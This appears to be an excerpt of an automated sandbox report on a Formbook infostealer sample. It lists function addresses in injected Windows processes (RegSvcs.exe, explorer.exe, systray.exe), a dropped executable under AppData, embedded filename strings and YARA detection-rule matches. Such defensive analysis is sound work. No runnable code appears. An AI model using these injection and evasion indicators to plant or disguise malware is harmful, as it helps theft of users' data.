Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0163516C	6_2_0163516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EF172	6_2_015EF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160B1B0	6_2_0160B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B70E9	6_2_016B70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BF0E0	6_2_016BF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016070C0	6_2_016070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016AF0CC	6_2_016AF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015ED34C	6_2_015ED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B132D	6_2_016B132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0164739A	6_2_0164739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A12ED	6_2_016A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161D2F0	6_2_0161D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161B2C0	6_2_0161B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016052A0	6_2_016052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B7571	6_2_016B7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C95C3	6_2_016C95C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169D5B0	6_2_0169D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F1460	6_2_015F1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BF43F	6_2_016BF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BF7B0	6_2_016BF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01645630	6_2_01645630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B16CC	6_2_016B16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01609950	6_2_01609950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161B950	6_2_0161B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01695910	6_2_01695910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166D800	6_2_0166D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016038E0	6_2_016038E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BFB76	6_2_016BFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01675BF0	6_2_01675BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0163DBF9	6_2_0163DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161FB80	6_2_0161FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01673A6C	6_2_01673A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BFA49	6_2_016BFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B7A46	6_2_016B7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016ADAC6	6_2_016ADAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01645AA0	6_2_01645AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169DAAC	6_2_0169DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A1AA3	6_2_016A1AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B7D73	6_2_016B7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01603D40	6_2_01603D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B1D5A	6_2_016B1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161FDC0	6_2_0161FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01679C32	6_2_01679C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BFCF2	6_2_016BFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BFF09	6_2_016BFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015C3FD5	6_2_015C3FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015C3FD2	6_2_015C3FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BFFB1	6_2_016BFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01601F92	6_2_01601F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01609EB0	6_2_01609EB0
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4E7232	7_2_0F4E7232
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4DED02	7_2_0F4DED02
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4E4912	7_2_0F4E4912
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4E1B32	7_2_0F4E1B32
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4E1B30	7_2_0F4E1B30
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4EA5CD	7_2_0F4EA5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4E6036	7_2_0F4E6036
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4DD082	7_2_0F4DD082
Source: C:\Windows\explorer.exe	Code function: 7_2_0F917B30	7_2_0F917B30
Source: C:\Windows\explorer.exe	Code function: 7_2_0F917B32	7_2_0F917B32
Source: C:\Windows\explorer.exe	Code function: 7_2_0F91D232	7_2_0F91D232
Source: C:\Windows\explorer.exe	Code function: 7_2_0F9205CD	7_2_0F9205CD
Source: C:\Windows\explorer.exe	Code function: 7_2_0F91A912	7_2_0F91A912
Source: C:\Windows\explorer.exe	Code function: 7_2_0F914D02	7_2_0F914D02
Source: C:\Windows\explorer.exe	Code function: 7_2_0F913082	7_2_0F913082
Source: C:\Windows\explorer.exe	Code function: 7_2_0F91C036	7_2_0F91C036
Source: C:\Windows\explorer.exe	Code function: 7_2_0FAB9B32	7_2_0FAB9B32
Source: C:\Windows\explorer.exe	Code function: 7_2_0FAB9B30	7_2_0FAB9B30
Source: C:\Windows\explorer.exe	Code function: 7_2_0FABF232	7_2_0FABF232
Source: C:\Windows\explorer.exe	Code function: 7_2_0FAC25CD	7_2_0FAC25CD
Source: C:\Windows\explorer.exe	Code function: 7_2_0FAB6D02	7_2_0FAB6D02
Source: C:\Windows\explorer.exe	Code function: 7_2_0FABC912	7_2_0FABC912
Source: C:\Windows\explorer.exe	Code function: 7_2_0FAB5082	7_2_0FAB5082
Source: C:\Windows\explorer.exe	Code function: 7_2_0FABE036	7_2_0FABE036
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03232650	8_2_03232650
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03231428	8_2_03231428
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_032334F0	8_2_032334F0
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03231BB8	8_2_03231BB8
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_032308D1	8_2_032308D1
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_032313AE	8_2_032313AE
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_032343E0	8_2_032343E0
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_032343F0	8_2_032343F0
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03235228	8_2_03235228
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03232098	8_2_03232098
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_032357E0	8_2_032357E0
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_032357D2	8_2_032357D2
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_032355B2	8_2_032355B2
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_032355C0	8_2_032355C0
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03233408	8_2_03233408
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03235BF8	8_2_03235BF8
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03235A4A	8_2_03235A4A
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03235A58	8_2_03235A58
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03234F0A	8_2_03234F0A
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_03234F18	8_2_03234F18
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_0597698C	8_2_0597698C
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_059789D8	8_2_059789D8
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_059789C8	8_2_059789C8
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_09C84210	8_2_09C84210
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_09C895F8	8_2_09C895F8
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_09C81F08	8_2_09C81F08
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_09C81EF7	8_2_09C81EF7
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 8_2_09C84201	8_2_09C84201
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E3E4F6	12_2_04E3E4F6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E42446	12_2_04E42446
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E34420	12_2_04E34420
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E50591	12_2_04E50591
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D90535	12_2_04D90535
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DAC6E0	12_2_04DAC6E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D8C7C0	12_2_04D8C7C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DB4750	12_2_04DB4750
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D90770	12_2_04D90770
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E22000	12_2_04E22000
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E481CC	12_2_04E481CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E441A2	12_2_04E441A2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E501AA	12_2_04E501AA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E18158	12_2_04E18158
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D80100	12_2_04D80100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E2A118	12_2_04E2A118
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E102C0	12_2_04E102C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E30274	12_2_04E30274
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E503E6	12_2_04E503E6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D9E3F0	12_2_04D9E3F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4A352	12_2_04E4A352
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D80CF2	12_2_04D80CF2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E30CB5	12_2_04E30CB5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D90C00	12_2_04D90C00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D8ADE0	12_2_04D8ADE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DA8DBF	12_2_04DA8DBF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D9AD00	12_2_04D9AD00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E2CD1F	12_2_04E2CD1F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4EEDB	12_2_04E4EEDB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DA2E90	12_2_04DA2E90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4CE93	12_2_04E4CE93
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D90E59	12_2_04D90E59
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4EE26	12_2_04E4EE26
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D82FC8	12_2_04D82FC8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E0EFA0	12_2_04E0EFA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E04F40	12_2_04E04F40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E32F30	12_2_04E32F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DB0F30	12_2_04DB0F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DD2F28	12_2_04DD2F28
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DBE8F0	12_2_04DBE8F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D768B8	12_2_04D768B8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D9A840	12_2_04D9A840
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D92840	12_2_04D92840
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E5A9A6	12_2_04E5A9A6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D929A0	12_2_04D929A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DA6962	12_2_04DA6962
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D8EA80	12_2_04D8EA80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E46BD7	12_2_04E46BD7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4AB40	12_2_04E4AB40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D81460	12_2_04D81460
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4F43F	12_2_04E4F43F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E595C3	12_2_04E595C3
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E2D5B0	12_2_04E2D5B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E47571	12_2_04E47571
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E416CC	12_2_04E416CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DD5630	12_2_04DD5630
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4F7B0	12_2_04E4F7B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4F0E0	12_2_04E4F0E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E470E9	12_2_04E470E9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D970C0	12_2_04D970C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E3F0CC	12_2_04E3F0CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D9B1B0	12_2_04D9B1B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E5B16B	12_2_04E5B16B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D7F172	12_2_04D7F172
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC516C	12_2_04DC516C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E312ED	12_2_04E312ED
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DAB2C0	12_2_04DAB2C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DAD2F0	12_2_04DAD2F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D952A0	12_2_04D952A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DD739A	12_2_04DD739A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D7D34C	12_2_04D7D34C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4132D	12_2_04E4132D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4FCF2	12_2_04E4FCF2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E09C32	12_2_04E09C32
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DAFDC0	12_2_04DAFDC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E47D73	12_2_04E47D73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D93D40	12_2_04D93D40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E41D5A	12_2_04E41D5A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D99EB0	12_2_04D99EB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D53FD5	12_2_04D53FD5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D53FD2	12_2_04D53FD2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D91F92	12_2_04D91F92
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4FFB1	12_2_04E4FFB1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4FF09	12_2_04E4FF09
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D938E0	12_2_04D938E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DFD800	12_2_04DFD800
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04D99950	12_2_04D99950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DAB950	12_2_04DAB950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E25910	12_2_04E25910
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E3DAC6	12_2_04E3DAC6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E31AA3	12_2_04E31AA3
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E2DAAC	12_2_04E2DAAC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DD5AA0	12_2_04DD5AA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E03A6C	12_2_04E03A6C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E47A46	12_2_04E47A46
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4FA49	12_2_04E4FA49
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E05BF0	12_2_04E05BF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DCDBF9	12_2_04DCDBF9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DAFB80	12_2_04DAFB80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04E4FB76	12_2_04E4FB76
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E8E7A0	12_2_02E8E7A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E72FB0	12_2_02E72FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E72D87	12_2_02E72D87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E72D90	12_2_02E72D90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E8D596	12_2_02E8D596
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E8DB2A	12_2_02E8DB2A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E8DE60	12_2_02E8DE60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E79E4B	12_2_02E79E4B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E79E50	12_2_02E79E50

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01635130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0166EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01647E54 appears 107 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0167F290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 015EB970 appears 262 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04DC5130 appears 58 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04DFEA12 appears 86 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04DD7E54 appears 107 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04D7B970 appears 262 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04E0F290 appears 103 times

Source: 22#U0415.exe, 00000000.00000000.1627632605.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTSmIapnD.exeD vs 22#U0415.exe
Source: 22#U0415.exe, 00000000.00000002.1669156208.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 22#U0415.exe
Source: 22#U0415.exe, 00000000.00000002.1671381278.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 22#U0415.exe
Source: 22#U0415.exe, 00000000.00000002.1676632400.00000000096E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 22#U0415.exe
Source: 22#U0415.exe	Binary or memory string: OriginalFilenameTSmIapnD.exeD vs 22#U0415.exe

Source: 22#U0415.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
